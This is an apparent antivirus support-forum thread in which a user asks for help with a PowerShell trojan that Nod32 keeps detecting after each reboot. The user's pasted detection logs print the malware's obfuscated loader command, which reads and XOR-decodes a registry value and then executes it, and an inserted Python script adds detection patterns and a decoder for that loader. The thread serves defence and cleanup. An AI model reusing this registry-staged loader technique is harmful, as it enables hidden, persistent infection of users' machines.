mic63 (posted July 24, 2023)

Hello everybody, I am writing about a problem I can't get out of. Nod32 continuously detects what follows, cleans the infection, but after a reboot the problem starts again. On the next boot Nod32 again detects, cleans... reboot... again the same problem, and so on. Maybe some of you has a suggestion to work it out once and for all? Thanks for any kind help from you. Mik

P.S.: I hope I wrote this correctly, to respect the forum rules?

Ora;Scanner;Tipo di oggetto;Oggetto;Rilevamento;Azione;Utente;Informazione;Hash;Prima visualizzazione
21/lug/2023 16:43:12;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8;
22/lug/2023 08:15:50;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8;
24/lug/2023 15:51:06;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8;
Marcos (Administrator, posted July 24, 2023)

Please collect logs with ESET Log Collector while selecting "Threat detection" in its menu. Later you will delete the binary payload from the registry in HKLM\SOfTWARE\AlieNwarEDB3A6N, but for now don't delete anything until we get the logs and find the loader.
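The command in the detection log above reads a registry value, XORs every byte with 229 and hands the result to a script block, so the registry key Marcos names is where the payload is staged. As an added example (not code from the thread or from ESET), the Python script below parses the semicolon-separated export format shown above, flags that loader pattern in each record's command line, extracts the registry key, value name and XOR key an administrator needs for the later cleanup, and decodes an exported value offline for inspection; the sample record is constructed from the first entry above, and the field names are the Italian headers of that export.

```python
import re

# Constructed sample: the header row plus one record in the semicolon-separated
# layout of the ESET detection-log export pasted in the thread above.
SAMPLE_LOG = r"""Ora;Scanner;Tipo di oggetto;Oggetto;Rilevamento;Azione;Utente;Informazione;Hash;Prima visualizzazione
21/lug/2023 16:43:12;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8;
"""

# Patterns describing this loader's technique, matched case-insensitively because
# the sample randomises letter case to defeat naive string matching.
REGISTRY_READ = re.compile(r"get-itemproperty\s+-path\s+'(hk[a-z]+:[^']+)'\)\.'([^']+)'", re.I)
XOR_KEY = re.compile(r"-bxor\s+(\d+)", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "scriptblock_create": re.compile(r"\[scriptblock\]::create", re.I),
    "dynamic_invoke": re.compile(r"\b(?:icm|invoke-command|iex|invoke-expression)\b", re.I),
    "registry_stage": REGISTRY_READ,
    "xor_decode": XOR_KEY,
}

def parse_eset_log(text):
    """Yield one dict per record, keyed by the header names of the export."""
    lines = [l for l in text.splitlines() if l.strip()]
    header = lines[0].split(";")
    for line in lines[1:]:
        yield dict(zip(header, line.split(";")))

def analyze_command(command):
    """Return the loader indicators found in one command line plus its staging location."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(command))
    reg = REGISTRY_READ.search(command)
    xor = XOR_KEY.search(command)
    return {
        "indicators": hits,
        "registry_key": reg.group(1) if reg else None,
        "value_name": reg.group(2) if reg else None,
        "xor_key": int(xor.group(1)) if xor else None,
        # Three or more indicators together is the fileless registry-loader pattern.
        "suspicious": len(hits) >= 3,
    }

def triage(text):
    """Run analyze_command over the 'Informazione' (command line) field of every record."""
    return [dict(time=r["Ora"], detection=r["Rilevamento"], **analyze_command(r["Informazione"]))
            for r in parse_eset_log(text)]

def decode_payload(data, key):
    """Undo the single-byte XOR so an exported registry value can be read in an editor."""
    return bytes(b ^ key for b in data)
```

Feed `triage()` the full export to get one finding per record; the `registry_key` and `value_name` fields tell you which value to export and pass to `decode_payload()` with the recovered `xor_key`.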
mic63 (author, posted July 26, 2023)

Thanks Marcos, I have just done it. Attached are the two zip files created by the log collector: eav_logs.zip and elc3ADC.tmp-samples.zip. I hope I did everything correctly.
Marcos (Administrator, posted July 26, 2023)

The machine has not been restarted for almost 2 days. Please restart it and see if the malware is cleaned from the registry during a startup scan. I don't see any reason why it wouldn't be, since the Scheduled task is normally detected here.

Also I'd strongly recommend enabling:
Web access protection
Anti-Phishing protection
LiveGrid - feedback system

With Web access protection off you open the door to Internet-borne threats, and we cannot help you clean the infection until ESET is configured properly for protection.
mic63 (author, posted July 26, 2023)

Hi Marcos, my PC works all day long during these days, with a couple of restarts every day. In any case I'll enable all the protections you just suggested to see what happens and whether something changes. I also searched for the key HKLM\SOfTWARE\AlieNwarEDB3A6N in the registry but couldn't find it (humbled). I'll write to you in the next days. Thanks for your help.